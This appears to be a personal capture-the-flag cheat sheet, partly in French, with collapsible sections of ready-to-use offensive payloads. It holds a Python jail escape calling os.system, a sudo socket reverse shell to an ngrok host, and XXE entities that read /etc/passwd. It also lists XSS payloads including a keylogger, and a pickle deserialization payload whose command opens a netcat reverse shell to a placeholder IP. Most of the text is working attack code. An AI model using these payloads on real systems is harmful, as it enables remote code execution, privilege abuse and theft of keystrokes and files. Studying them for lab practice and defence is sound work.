<details><summary>pyrhonJail</summary>

Certains caratères sont interpretés, edit pour mieux voir

    ""._class.mro[1].subclasses()[132].init.globals_['s' + 'ys' + 'tem']('cat pyjail.py')

</details>


<details><summary>Socket reverse</summary>

sudo -u privilegeduser /usr/bin/socket -qvp '/bin/sh -i' 2.tcp.eu.ngrok.io 18515

</details>

<details><summary>Reverse shell cheatcheet</summary>

[Payloads Reverse shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

</details>

<details><summary>XXE Payloads</summary>

    - Display content

    <!DOCTYPE replace [<!ENTITY name "feast"> ]>
    <userInfo>
    <firstName>falcon</firstName>
    <lastName>&name;</lastName>
    </userInfo>

    - Read file

    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
    <root>&read;</root>

</details>

<details><summary>XSS Payloads</summary>

    Popup's (<script>alert(“Hello World”)</script>) - Creates a Hello World message popup on a users browser.
    Writing HTML (document.write) - Override the website's HTML to add your own (essentially defacing the entire page).
    XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - You can log all keystrokes of a user,        capturing their password and other sensitive information they type into the webpage.
    Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - A mini local port scanner (more information on   this is covered in the TryHackMe XSS room).

[ XSS Payloads ](http://www.xss-payloads.com/)

</details>

<details><summary>Pickle payloads</summary>

    import pickle
    import sys
    import base64

    command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'

    class rce(object):
        def __reduce__(self):
            import os
            return (os.system,(command,))
    print(base64.b64encode(pickle.dumps(rce())))

</details>

<details><summary>Stegano tools</summary>

- [aperisolve](https://www.aperisolve.com/)



</details>
